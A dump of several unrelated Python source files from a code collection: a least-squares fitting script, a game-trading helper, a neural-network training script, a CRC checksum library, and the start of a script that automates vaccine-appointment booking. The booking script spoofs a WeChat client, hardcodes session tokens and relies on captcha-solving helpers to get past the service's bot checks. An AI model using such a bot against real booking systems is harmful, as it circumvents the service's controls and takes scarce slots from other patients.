# Divides x by y. If y is zero, returns 0.
divide = lambda x, y : 0 if y == 0 else x / y
# Set up and solve the matrix equation
A = np.array([[1, divide(sum_ef_mf, sum_ef_sq)],[divide(sum_ef_mf, sum_mf_sq), 1]])
B = np.array([divide(sum_ef, sum_ef_sq), divide(sum_mf, sum_mf_sq)])
A_inv = np.linalg.pinv(A)
x = np.matmul(A_inv, B)
return x
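# The matrix equation built above comes from the same least-squares idea with two
# coefficients: with r_ef = r_e / r_f and r_mf = r_m / r_f, minimizing
#   sum_i (x0 * r_ef_i + x1 * r_mf_i - 1)^2
# gives the normal equations
#   x0 * sum(r_ef^2)      + x1 * sum(r_ef * r_mf) = sum(r_ef)
#   x0 * sum(r_ef * r_mf) + x1 * sum(r_mf^2)      = sum(r_mf)
# Dividing the first row by sum(r_ef^2) and the second by sum(r_mf^2) yields the
# A and B arrays above; np.linalg.pinv keeps the system solvable when a sum is zero.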
# Calculates the average percentage error between A and B.
def average_error_model_a(A, B, x):
error = 0
for i, a in enumerate(A):
a = a[0]
b = B[i][0]
if b == 0:
continue
error += abs(x*a - b) / b
error *= 100
error /= A.shape[0]
return error
def average_error_model_b(A, M, B, x):
error = 0
for i, a in enumerate(A):
a = a[0]
mv = M[i]
b = B[i][0]
if b == 0:
continue
estimate = x[0]*a
estimate += x[1]*mv
error += abs(estimate - b) / b
error *= 100
error /= A.shape[0]
return error
# Traverses the data and prints out one value for
# each update type.
def print_solutions(file_path):
data = np.genfromtxt(file_path, delimiter="\t")
prev_update = 0
split_list_indices = list()
for i, val in enumerate(data):
if prev_update != val[3]:
split_list_indices.append(i)
prev_update = val[3]
split = np.split(data, split_list_indices)
for array in split:
A, mv, B, update = np.hsplit(array, 4)
print("update type:", update[0][0])
xa = minimize_percentage_error_model_a(A, B)
xb = minimize_percentage_error_model_b(A, mv, B)
print("Model A coefficients:", xa, " | Model B coefficients:", xb)
error_a = average_error_model_a(A, B, xa)
error_b = average_error_model_b(A, mv, B, xb)
baseline_error_a = average_error_model_a(A, B, 1)
baseline_error_b = average_error_model_b(A, mv, B, [1, 1])
print("error a:", error_a, " | error b:", error_b)
print("baseline error a:", baseline_error_a, "baseline error b:", baseline_error_b)
print()
if __name__ == "__main__":
print_solutions("data2/lowres_17f_target150_data.txt")
``` |
{
"source": "1480c1/poe-currency-flip-planner",
"score": 3
} |
#### File: poe-currency-flip-planner/src/commons.py
```python
import logging
from typing import Any, Dict, List, Set
import numpy as np
league_names = ["Heist", "Hardcore Heist", "Standard", "Hardcore"]
def filter_large_outliers(offers: List[Dict]) -> List[Dict]:
"""
Filter out all offers with a conversion rate which is above the
95th percentile of all found conversion rates for an item pair.
"""
if len(offers) > 10:
conversion_rates = [e["conversion_rate"] for e in offers]
upper_boundary = np.percentile(conversion_rates, 95)
offers = [x for x in offers if x["conversion_rate"] < upper_boundary]
return offers
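# Rough usage sketch (illustrative numbers, field name as used above):
#   offers = [{"conversion_rate": r} for r in
#             [1.0, 1.1, 0.9, 1.2, 1.0, 1.1, 0.95, 1.05, 1.0, 1.15, 50.0]]
#   filter_large_outliers(offers)   # drops the 50.0 offer, keeps the other ten
# With ten or fewer offers the list is returned unchanged.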
def init_logger(debug: bool):
level = logging.DEBUG if debug else logging.INFO
logging.basicConfig(level=level, format='%(message)s')
def load_excluded_traders():
default_path = "config/excluded_traders.txt"
with open(default_path, "r") as f:
excluded_traders = [x.strip() for x in f.readlines()]
return excluded_traders
def unique_conversions_by_trader_name(
conversions: List[Dict[str, Any]]) -> List[Dict]:
seen_traders: Set[str] = set()
unique_conversions = []
for conversion in conversions:
trader_names = [t.contact_ign for t in conversion["transactions"]]
has_seen_trader = any(
[True for x in trader_names if x in seen_traders])
if has_seen_trader:
continue
for t in trader_names:
seen_traders.add(t)
unique_conversions.append(conversion)
return unique_conversions
``` |
{
"source": "1483795887/ubiquant_danet",
"score": 2
} |
#### File: 1483795887/ubiquant_danet/main.py
```python
from DAN_Task import DANetClassifier, DANetRegressor
import argparse
import os
import torch.distributed
import torch.backends.cudnn
from sklearn.metrics import accuracy_score, mean_squared_error
from data.dataset import get_data
from lib.utils import normalize_reg_label
from qhoptim.pyt import QHAdam
from config.default import cfg
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
def get_args():
parser = argparse.ArgumentParser(description='PyTorch v1.4, DANet Task Training')
parser.add_argument('-c', '--config', type=str, required=False, default='config/forest_cover_type.yaml', metavar="FILE", help='Path to config file')
parser.add_argument('-g', '--gpu_id', type=str, default='1', help='GPU ID')
args = parser.parse_args()
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu_id
torch.backends.cudnn.benchmark = True if len(args.gpu_id) < 2 else False
if args.config:
cfg.merge_from_file(args.config)
cfg.freeze()
task = cfg.task
seed = cfg.seed
train_config = {'dataset': cfg.dataset, 'resume_dir': cfg.resume_dir, 'logname': cfg.logname}
fit_config = dict(cfg.fit)
model_config = dict(cfg.model)
print('Using config: ', cfg)
return train_config, fit_config, model_config, task, seed, len(args.gpu_id)
def set_task_model(task, std=None, seed=1):
if task == 'classification':
clf = DANetClassifier(
optimizer_fn=QHAdam,
optimizer_params=dict(lr=fit_config['lr'], weight_decay=1e-5, nus=(0.8, 1.0)),
scheduler_params=dict(gamma=0.95, step_size=20),
scheduler_fn=torch.optim.lr_scheduler.StepLR,
layer=model_config['layer'],
base_outdim=model_config['base_outdim'],
k=model_config['k'],
drop_rate=model_config['drop_rate'],
seed=seed
)
eval_metric = ['accuracy']
elif task == 'regression':
clf = DANetRegressor(
std=std,
optimizer_fn=QHAdam,
optimizer_params=dict(lr=fit_config['lr'], weight_decay=fit_config['weight_decay'], nus=(0.8, 1.0)),
scheduler_params=dict(gamma=0.95, step_size=fit_config['schedule_step']),
scheduler_fn=torch.optim.lr_scheduler.StepLR,
layer=model_config['layer'],
base_outdim=model_config['base_outdim'],
k=model_config['k'],
seed=seed
)
eval_metric = ['mse']
return clf, eval_metric
if __name__ == '__main__':
print('===> Setting configuration ...')
train_config, fit_config, model_config, task, seed, n_gpu = get_args()
logname = None if train_config['logname'] == '' else train_config['dataset'] + '/' + train_config['logname']
print('===> Getting data ...')
X_train, y_train, X_valid, y_valid, X_test, y_test = get_data(train_config['dataset'])
mu, std = None, None
if task == 'regression':
mu, std = y_train.mean(), y_train.std()
print("mean = %.5f, std = %.5f" % (mu, std))
y_train = normalize_reg_label(y_train, std, mu)
y_valid = normalize_reg_label(y_valid, std, mu)
y_test = normalize_reg_label(y_test, std, mu)
clf, eval_metric = set_task_model(task, std, seed)
clf.fit(
X_train=X_train, y_train=y_train,
eval_set=[(X_valid, y_valid)],
eval_name=['valid'],
eval_metric=eval_metric,
max_epochs=fit_config['max_epochs'], patience=fit_config['patience'],
batch_size=fit_config['batch_size'], virtual_batch_size=fit_config['virtual_batch_size'],
logname=logname,
resume_dir=train_config['resume_dir'],
n_gpu=n_gpu
)
preds_test = clf.predict(X_test)
if task == 'classification':
test_acc = accuracy_score(y_pred=preds_test, y_true=y_test)
print(f"FINAL TEST ACCURACY FOR {train_config['dataset']} : {test_acc}")
elif task == 'regression':
test_mse = mean_squared_error(y_pred=preds_test, y_true=y_test)
print(f"FINAL TEST MSE FOR {train_config['dataset']} : {test_mse}")
``` |
{
"source": "1484076353/PyCRC",
"score": 3
} |
#### File: PyCRC/PyCRC/crc.py
```python
from PyCRC import *
class CRC:
@classmethod
def CRC(cls, check_str, model=None, ascii=False):
global bytes
        if ascii:  # the input parameter is a plain character string
try:
bytes = [ord(item) for item in check_str]
except Exception:
raise
else:
check_hex = check_str.replace(' ', '')
try:
bytes = [int(check_hex[i:i + 2], 16) for i in range(0, len(check_hex), 2)]
except Exception:
raise
if model == CRC_4_ITU:
return cls()._crc_4_itu(bytes)
elif model == CRC_5_EPC:
return cls()._crc_5_epc(bytes)
elif model == CRC_5_ITU:
return cls()._crc_5_itu(bytes)
elif model == CRC_5_USB:
return cls()._crc_5_usb(bytes)
elif model == CRC_6_ITU:
return cls()._crc_6_itu(bytes)
elif model == CRC_7_MMC:
return cls()._crc_7_mmc(bytes)
elif model == CRC_8:
return cls()._crc_8(bytes)
elif model == CRC_8_ITU:
return cls()._crc_8_itu(bytes)
elif model == CRC_8_ROHC:
return cls()._crc_8_rohc(bytes)
elif model == CRC_8_MAXIM:
return cls()._crc_8_maxim(bytes)
elif model == CRC_16_IBM:
return cls()._crc_16_ibm(bytes)
elif model == CRC_16_MAXIM:
return cls()._crc_16_maxim(bytes)
elif model == CRC_16_USB:
return cls()._crc_16_usb(bytes)
elif model == CRC_16_MODBUS:
return cls()._crc_16_modbus(bytes)
elif model == CRC_16_CCITT:
return cls()._crc_16_ccitt(bytes)
elif model == CRC_16_CCITT_FALSE:
return cls()._crc_16_ccitt_false(bytes)
elif model == CRC_16_X25:
return cls()._crc_16_x25(bytes)
elif model == CRC_16_XMODEM:
return cls()._crc_16_xmodem(bytes)
elif model == CRC_16_DNP:
return cls()._crc_16_dnp(bytes)
elif model == CRC_32:
return cls()._crc_32(bytes)
elif model == CRC_32_MPEG_2:
return cls()._crc_32_mpeg_2(bytes)
else:
return None
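    # Usage sketch (assumes the model constants such as CRC_16_MODBUS are
    # exported by the PyCRC package, as the dispatch above implies). For the
    # standard check string "123456789", CRC-16/MODBUS should yield "4B37":
    #   CRC.CRC("123456789", CRC_16_MODBUS, ascii=True)  # -> '4B37'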
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
# *Name: CRC-4/ITU x4 + x + 1
# *Width: 4
# *Poly: 0x03
# *Init: 0x00
# *Xorout: 0x00
# *Refin: True
# *Refout: True False
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** *
def _crc_4_itu(self, bytes):
Width, Poly, Init, Refin, Refout = 4, 0x03, 0x00, True, False
Poly <<= (8 - Width)
return self._ufunc(bytes, Width, Poly, Init, Refin, Refout)
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
# *Name: CRC-5/EPC x5 + x3 + 1
# *Width: 5
# *Poly: 0x09
# *Init: 0x09
# *Xorout: 0x00
# *Refin: False
# *Refout: False
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** *
def _crc_5_epc(self, bytes):
Width, Poly, Init, Refin, Refout = 5, 0x09, 0x09, False, False
Init <<= (8 - Width)
Poly <<= (8 - Width)
result = self._ufunc(bytes, Width, Poly, Init, Refin, Refout)
return self._get_crc(Width, (int(result, 16) >> 3), Refout)
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
# *Name: CRC-5/ITU x5 + x4 + x2 + 1
# *Width: 5
# *Poly: 0x15
# *Init: 0x00
# *Xorout: 0x00
# *Refin: True
# *Refout: True False
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** *
def _crc_5_itu(self, bytes):
Width, Poly, Init, Refin, Refout = 5, 0x15, 0x00, True, False
Poly <<= (8 - Width)
return self._ufunc(bytes, Width, Poly, Init, Refin, Refout)
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
# *Name: CRC-5/USB x5 + x2 + 1
# *Width: 5
# *Poly: 0x05
# *Init: 0x1F
# *Xorout: 0x1F
# *Refin: True
# *Refout: True False
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** *
def _crc_5_usb(self, bytes):
Width, Poly, Init, Xorout, Refin, Refout = 5, 0x05, 0x1F, 0x1F, True, False
Poly <<= (8 - Width)
result = self._ufunc(bytes, Width, Poly, Init, Refin, Refout)
return self._get_crc(Width, (int(result, 16) ^ Xorout), Refout)
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
# *Name: CRC-6/ITU x6 + x + 1
# *Width: 6
# *Poly: 0x03
# *Init: 0x00
# *Xorout: 0x00
# *Refin: True
# *Refout: True False
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** *
def _crc_6_itu(self, bytes):
Width, Poly, Init, Refin, Refout = 6, 0x03, 0x00, True, False
Poly <<= (8 - Width)
return self._ufunc(bytes, Width, Poly, Init, Refin, Refout)
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
# *Name: CRC-7/MMC x7 + x3 + 1
# *Width: 7
# *Poly: 0x09
# *Init: 0x00
# *Xorout: 0x00
# *Refin: False
# *Refout: False
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** *
def _crc_7_mmc(self, bytes):
Width, Poly, Init, Refin, Refout = 7, 0x09, 0x00, False, False
Poly <<= (8 - Width)
result = self._ufunc(bytes, Width, Poly, Init, Refin, Refout)
return self._get_crc(Width, (int(result, 16) >> 1), Refout)
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
# *Name: CRC-8 x8 + x2 + x + 1
# *Width: 8
# *Poly: 0x07
# *Init: 0x00
# *Xorout: 0x00
# *Refin: False
# *Refout: False
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** *
def _crc_8(self, bytes):
Width, Poly, Init, Refin, Refout = 8, 0x07, 0x00, False, False
return self._ufunc(bytes, Width, Poly, Init, Refin, Refout)
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
# *Name: CRC-8/ITU x8 + x2 + x + 1
# *Width: 8
# *Poly: 0x07
# *Init: 0x00
# *Xorout: 0x55
# *Refin: False
# *Refout: False
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** *
def _crc_8_itu(self, bytes):
Width, Poly, Init, Xorout, Refin, Refout = 8, 0x07, 0x00, 0x55, False, False
result = self._ufunc(bytes, Width, Poly, Init, Refin, Refout)
return self._get_crc(Width, (int(result, 16) ^ Xorout), Refout)
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
# *Name: CRC-8/ROHC x8 + x2 + x + 1
# *Width: 8
# *Poly: 0x07
# *Init: 0xFF
# *Xorout: 0x00
# *Refin: True
# *Refout: True False
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** *
def _crc_8_rohc(self, bytes):
Width, Poly, Init, Refin, Refout = 8, 0x07, 0xFF, True, False
return self._ufunc(bytes, Width, Poly, Init, Refin, Refout)
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
# *Name: CRC-8/MAXIM x8 + x5 + x4 + 1
# *Width: 8
# *Poly: 0x31
# *Init: 0x00
# *Xorout: 0x00
# *Refin: True
# *Refout: True False
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** *
def _crc_8_maxim(self, bytes):
Width, Poly, Init, Refin, Refout = 8, 0x31, 0x00, True, False
return self._ufunc(bytes, Width, Poly, Init, Refin, Refout)
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
# *Name: CRC-16/IBM x16 + x15 + x2 + 1
# *Width: 16
# *Poly: 0x8005
# *Init: 0x0000
# *Xorout: 0x0000
# *Refin: True
# *Refout: True False
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** *
def _crc_16_ibm(self, bytes):
Width, Poly, Init, Refin, Refout = 16, 0x8005, 0x0000, True, False
return self._ufunc(bytes, Width, Poly, Init, Refin, Refout)
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
# *Name: CRC-16/MAXIM x16 + x15 + x2 + 1
# *Width: 16
# *Poly: 0x8005
# *Init: 0x0000
# *Xorout: 0xFFFF
# *Refin: True
# *Refout: True
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** *
def _crc_16_maxim(self, bytes):
Width, Poly, Init, Refin, Refout = 16, 0x8005, 0x0000, True, True
return self._ufunc(bytes, Width, Poly, Init, Refin, Refout)
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
# *Name: CRC-16/USB x16 + x15 + x2 + 1
# *Width: 16
# *Poly: 0x8005
# *Init: 0xFFFF
# *Xorout: 0xFFFF
# *Refin: True
# *Refout: True
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** *
def _crc_16_usb(self, bytes):
Width, Poly, Init, Refin, Refout = 16, 0x8005, 0xFFFF, True, True
return self._ufunc(bytes, Width, Poly, Init, Refin, Refout)
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
# *Name: CRC-16/MODBUS x16 + x15 + x2 + 1
# *Width: 16
# *Poly: 0x8005
# *Init: 0xFFFF
# *Xorout: 0x0000
# *Refin: True
# *Refout: True False
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** *
def _crc_16_modbus(self, bytes):
Width, Poly, Init, Refin, Refout = 16, 0x8005, 0xFFFF, True, False
return self._ufunc(bytes, Width, Poly, Init, Refin, Refout)
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
# *Name: CRC-16/CCITT x16 + x12 + x5 + 1
# *Width: 16
# *Poly: 0x1021
# *Init: 0x0000
# *Xorout: 0x0000
# *Refin: True
# *Refout: True False
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** *
def _crc_16_ccitt(self, bytes):
Width, Poly, Init, Refin, Refout = 16, 0x1021, 0x0000, True, False
return self._ufunc(bytes, Width, Poly, Init, Refin, Refout)
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
# *Name: CRC-16/CCITT-FALSE x16 + x12 + x5 + 1
# *Width: 16
# *Poly: 0x1021
# *Init: 0xFFFF
# *Xorout: 0x0000
# *Refin: False
# *Refout: False
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** *
def _crc_16_ccitt_false(self, bytes):
Width, Poly, Init, Refin, Refout = 16, 0x1021, 0xFFFF, False, False
return self._ufunc(bytes, Width, Poly, Init, Refin, Refout)
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
# *Name: CRC-16/X25 x16 + x12 + x5 + 1
# *Width: 16
# *Poly: 0x1021
# *Init: 0xFFFF
# *Xorout: 0xFFFF
# *Refin: True
# *Refout: True
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** *
def _crc_16_x25(self, bytes):
Width, Poly, Init, Refin, Refout = 16, 0x1021, 0xFFFF, True, True
return self._ufunc(bytes, Width, Poly, Init, Refin, Refout)
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
# *Name: CRC-16/XMODEM x16 + x12 + x5 + 1
# *Width: 16
# *Poly: 0x1021
# *Init: 0x0000
# *Xorout: 0x0000
# *Refin: False
# *Refout: False
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** *
def _crc_16_xmodem(self, bytes):
Width, Poly, Init, Refin, Refout = 16, 0x1021, 0x0000, False, False
return self._ufunc(bytes, Width, Poly, Init, Refin, Refout)
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
# *Name: CRC-16/DNP x16 + x13 + x12 + x11 + x10 + x8 + x6 + x5 + x2 + 1
# *Width: 16
# *Poly: 0x3D65
# *Init: 0x0000
# *Xorout: 0xFFFF
# *Refin: True
# *Refout: True
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** *
def _crc_16_dnp(self, bytes):
Width, Poly, Init, Refin, Refout = 16, 0x3D65, 0x0000, True, True
return self._ufunc(bytes, Width, Poly, Init, Refin, Refout)
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
# *Name: CRC-32 x32 + x26 + x23 + x22 + x16 + x12 + x11 + x10 + x8 + x7 + x5 + x4 + x2 + x + 1
# *Width: 32
# *Poly: 0x4C11DB7
    # *Init: 0xFFFFFFFF
    # *Xorout: 0xFFFFFFFF
# *Refin: True
# *Refout: True
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** *
def _crc_32(self, bytes):
Width, Poly, Init, Refin, Refout = 32, 0x04C11DB7, 0xFFFFFFFF, True, True
return self._ufunc(bytes, Width, Poly, Init, Refin, Refout)
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
# *Name: CRC-32/MPEG-2 x32 + x26 + x23 + x22 + x16 + x12 + x11 + x10 + x8 + x7 + x5 + x4 + x2 + x + 1
# *Width: 32
# *Poly: 0x4C11DB7
    # *Init: 0xFFFFFFFF
    # *Xorout: 0x00000000
# *Refin: False
# *Refout: False
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** * /
def _crc_32_mpeg_2(self, bytes):
Width, Poly, Init, Refin, Refout = 32, 0x04C11DB7, 0xFFFFFFFF, False, False
return self._ufunc(bytes, Width, Poly, Init, Refin, Refout)
def _ufunc(self, bytes, Width, Poly, Init, Refin, Refout):
Poly = self._get_poly(Width, Poly, Refin)
scope = self._get_scope(Width, Refin)
offset = Width - 8
for buffer in bytes:
if Refin:
Init ^= buffer
else:
Init ^= buffer << (offset if offset > 0 else 0)
Init = self._get_course(Init, scope, Width, Refin, Poly)
return self._get_crc(Width, Init, Refout)
def _get_poly(self, Width, Poly, Refin):
if Refin:
Poly = int((bin(Poly)[2:]).zfill(Width if Width > 8 else 8)[::-1], 2)
return Poly
def _get_scope(self, Width, Refin):
if not Refin:
return 1 << (Width - 1 if Width >= 8 else 7)
return 1
def _get_course(self, Init, scope, Width, Refin, Poly):
for index in range(0, 8):
if Init & scope:
if Refin:
Init >>= 1
else:
Init <<= 1
Init = self._get_equilong(Init, Width)
Init ^= Poly
else:
if Refin:
Init >>= 1
else:
Init <<= 1
Init = self._get_equilong(Init, Width)
return Init
def _get_equilong(self, src, Width):
Width = Width if Width > 8 else 8
return int(bin(src)[2:].zfill(Width)[-Width:], 2)
def _get_crc(self, Width, Init, Refout):
real_width = Width
Width = Width if Width > 8 else 8
result = bin(Init)[2:].zfill(Width)
if Refout:
result = result.replace("0", "2").replace("1", "0").replace("2", "1")
Init = int(result[-Width:], 2)
length = real_width // 4 if real_width % 4 == 0 else (real_width // 4 + 1)
return (hex(Init)[2:]).zfill(Width // 4).upper()[-length:]
``` |
{
"source": "1486308032/yuemiao",
"score": 2
} |
#### File: 1486308032/yuemiao/main.py
```python
import json
import sys
import requests
import time
from hashlib import md5
import random
import captcha
import image
__value__ = {
"vaccineCode": "0208", # 0208
"vaccineIndex": "1", # 接种第几针
"linkmanId": "26605318", # 26605318
"subscribeDate": "2022-05-27",
"subscirbeTime": "2004 ", # GET 选择时间段时 响应body的Data ID
"departmentVaccineId": "9904", # 9904 10339
"depaCode": "4201050012", # 4202040003_b3f3799d4320171be60039325023fa67
    # md5 of (timestamp + subscirbeTime + fixed suffix), e.g. 2022030500482004fuckhacker10000
"serviceFee": "0",
"ticket": "28331688:26605318:4202040003:9904___1646412476944",
"channelCode": "yyymsg",
"idCardNo": "4211234612321313", # 身份证号码
"captchaVerification": "<KEY>
# 待加密文本:token+验证码坐标 <PASSWORD>---{"x":164.96428571428572,"y":5} 密钥:5GDh59HsZQ8CaJtD
"token": "9beeae52e806454c8afcc44d93abd762",
}
def getConfig():
head = {
"Host": "wx.scmttec.com",
"user-agent": "Mozilla/5.0 (Linux; Android 11) AppleWebKit/537.36 ("
"KHTML, like Gecko) Version/4.0 Chrome/87.0.4240.99 XWEB/3225 MMWEBSDK/20220402 Mobile "
"Safari/537.36 MMWEBID/9813 MicroMessenger/8.1.22.2140(0x280016E6) WeChat/arm64 Weixin "
"NetType/4G Language/zh_CN ABI/arm64",
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/wxpic,image/tpg,image/webp,"
"image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 ",
"x-requested-with": "com.tencent.mm",
"referer": "https://wx.scmttec.com/index.html",
"tk": "wxtoken:3117786a5086286af91ee9fe547793c8_e072d4f9ae73476bc59a8b86c8600d6d",
"st": md5(time.strftime("%Y-%m-%d %H:%M:%S").encode("utf8")).hexdigest(),
"cookie": "_xzkj_=wxtoken:3117786a5086286af91ee9fe547793c8_<PASSWORD>",
"accept-language": "zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7"
}
return head
def getIndex():
url = "https://wx.scmttec.com/index.html"
head = getConfig()
r = requests.get(url, headers=head)
r.encoding = "utf8"
print(r.text)
with open('./test.html', "w+", encoding="utf8") as f:
f.write(r.text)
# Vaccine hospital list page; longitude/latitude: nearby hospitals, name: search by name
def getDepartments():
url = "https://wx.scmttec.com/department/department/getDepartments.do"
url2 = "http://httpbin.org/post"
head = getConfig()
data = {
"offset": "0",
"limit": "10",
"name": "",
"regionCode": "4202",
"isOpen": "1",
"longitude": "115.01461",
"latitude": "30.210896",
"sortType": "1",
"vaccineCode": "",
"customId": "30",
}
r = requests.post(url=url, headers=head, data=data)
r.encoding = "utf8"
print(r.text)
a = json.loads(r.text)
for i in a.get("data").get("rows"):
name = i.get("name")
vaccineName = i.get("vaccineName")
code = i.get("code")
address = i.get("address")
depaVaccId = i.get("depaVaccId")
print(address)
# Vaccine hospital detail page
def getBaseInfo():
url = "https://wx.scmttec.com/base/departmentVaccine/item.do"
data = {
"id": __value__.get("departmentVaccineId"),
"isShowDescribtion": "true",
"showOthers": "true"
}
head = getConfig()
r = requests.get(url, headers=head, params=data)
r.encoding = "utf8"
print(r.text)
print(r.url)
res = json.loads(r.text)
__value__["vaccineCode"] = res["data"]["vaccineCode"]
__value__["depaCode"] = res["data"]["departmentCode"] # 待补充,提交订单需加时间戳md5
print("当前选中:", res["data"]["departmentName"], res["data"]["name"])
# Identity information of the people added under this account
def findByUserId():
url = "https://wx.scmttec.com/order/linkman/findByUserId.do" # ?userId=28331687
head = getConfig()
r = requests.get(url, headers=head)
a = json.loads(r.text)
for i in a.get("data"):
id = i.get("id")
username = i.get("name")
print(id, username)
# Check whether this vaccine can be subscribed to
def isCanSubscribe():
url = "https://wx.scmttec.com/subscribe/subscribe/isCanSubscribe.do"
head = getConfig()
    data = {  # hospital detail page
        "id": __value__["departmentVaccineId"],  # hospital ID
        "depaCode": __value__["depaCode"],  # administrative division code
        "vaccineCode": __value__["vaccineCode"],  # vaccine ID
        "linkmanId": __value__["linkmanId"],  # user identity (linkman) ID
}
r = requests.get(url, headers=head, params=data)
a = json.loads(r.text)
i = a.get("data")
canSubscribe = i.get("canSubscribe")
ticket = i.get("ticket")
__value__["ticket"] = ticket
print("能否订阅:", canSubscribe, ticket)
# Order page: available dates
def getWorkDay():
